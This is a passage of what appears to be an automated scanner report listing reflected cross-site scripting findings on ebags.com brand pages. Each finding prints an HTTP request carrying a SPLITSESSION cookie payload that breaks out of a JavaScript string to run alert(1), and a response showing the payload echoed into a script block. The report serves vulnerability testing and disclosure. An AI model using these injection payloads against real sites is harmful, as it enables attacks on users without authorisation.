1.31. http://www.ebags.com/brand/fleurville [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/fleurville

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e561'%3balert(1)//17f2a82fd26 was submitted in the SPLITSESSION cookie. This input was echoed as 9e561';alert(1)//17f2a82fd26 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /brand/fleurville HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C9e561'%3balert(1)//17f2a82fd26; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:14:59 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:14:59 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 62472

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|9e561';alert(1)//17f2a82fd26');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.32. http://www.ebags.com/brand/hobo-international [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/hobo-international

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8276a'%3balert(1)//ef97d0119db was submitted in the SPLITSESSION cookie. This input was echoed as 8276a';alert(1)//ef97d0119db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /brand/hobo-international HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C8276a'%3balert(1)//ef97d0119db; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:14:32 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:14:32 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 52236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|8276a';alert(1)//ef97d0119db');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.33. http://www.ebags.com/brand/hurley [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/hurley

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e6d1'%3balert(1)//2c88207f059 was submitted in the SPLITSESSION cookie. This input was echoed as 3e6d1';alert(1)//2c88207f059 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /brand/hurley HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C3e6d1'%3balert(1)//2c88207f059; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:15:09 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:15:09 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 83680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|3e6d1';alert(1)//2c88207f059');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.34. http://www.ebags.com/brand/ju-ju-be [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/ju-ju-be

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93998'%3balert(1)//c9644ddb34a was submitted in the SPLITSESSION cookie. This input was echoed as 93998';alert(1)//c9644ddb34a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /brand/ju-ju-be HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C93998'%3balert(1)//c9644ddb34a; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:15:08 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:15:08 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 68478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|93998';alert(1)//c9644ddb34a');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.35. http://www.ebags.com/brand/kalencom [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/kalencom

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77446'%3balert(1)//b3a84a8c4d6 was submitted in the SPLITSESSION cookie. This input was echoed as 77446';alert(1)//b3a84a8c4d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /brand/kalencom HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C77446'%3balert(1)//b3a84a8c4d6; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:16:13 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:16:13 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 103300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|77446';alert(1)//b3a84a8c4d6');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.36. http://www.ebags.com/brand/lego [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/lego

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6a3c'%3balert(1)//0364fe4302b was submitted in the SPLITSESSION cookie. This input was echoed as b6a3c';alert(1)//0364fe4302b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /brand/lego HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7Cb6a3c'%3balert(1)//0364fe4302b; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:16:02 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:16:02 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 64925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|b6a3c';alert(1)//0364fe4302b');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.37. http://www.ebags.com/brand/lodis [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/lodis

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6682f'%3balert(1)//44af505a2a1 was submitted in the SPLITSESSION cookie. This input was echoed as 6682f';alert(1)//44af505a2a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /brand/lodis HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C6682f'%3balert(1)//44af505a2a1; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:15:11 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:15:11 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 112625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|6682f';alert(1)//44af505a2a1');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.38. http://www.ebags.com/brand/michael-michael-kors-watches [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/michael-michael-kors-watches

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7964a'%3balert(1)//73649ca36b5 was submitted in the SPLITSESSION cookie. This input was echoed as 7964a';alert(1)//73649ca36b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /brand/michael-michael-kors-watches HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C7964a'%3balert(1)//73649ca36b5; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:15:02 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:15:02 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 106657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|7964a';alert(1)//73649ca36b5');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.39. http://www.ebags.com/brand/quiksilver [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/quiksilver

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27cfb'%3balert(1)//b526ef537e0 was submitted in the SPLITSESSION cookie. This input was echoed as 27cfb';alert(1)//b526ef537e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /brand/quiksilver HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C27cfb'%3balert(1)//b526ef537e0; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:14:55 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:14:55 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 59141

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|27cfb';alert(1)//b526ef537e0');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.40. http://www.ebags.com/brand/timi-and-leslie [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/timi-and-leslie

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85fde'%3balert(1)//59caba9823 was submitted in the SPLITSESSION cookie. This input was echoed as 85fde';alert(1)//59caba9823 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /brand/timi-and-leslie HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C85fde'%3balert(1)//59caba9823; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:16:56 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:16:56 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 67812

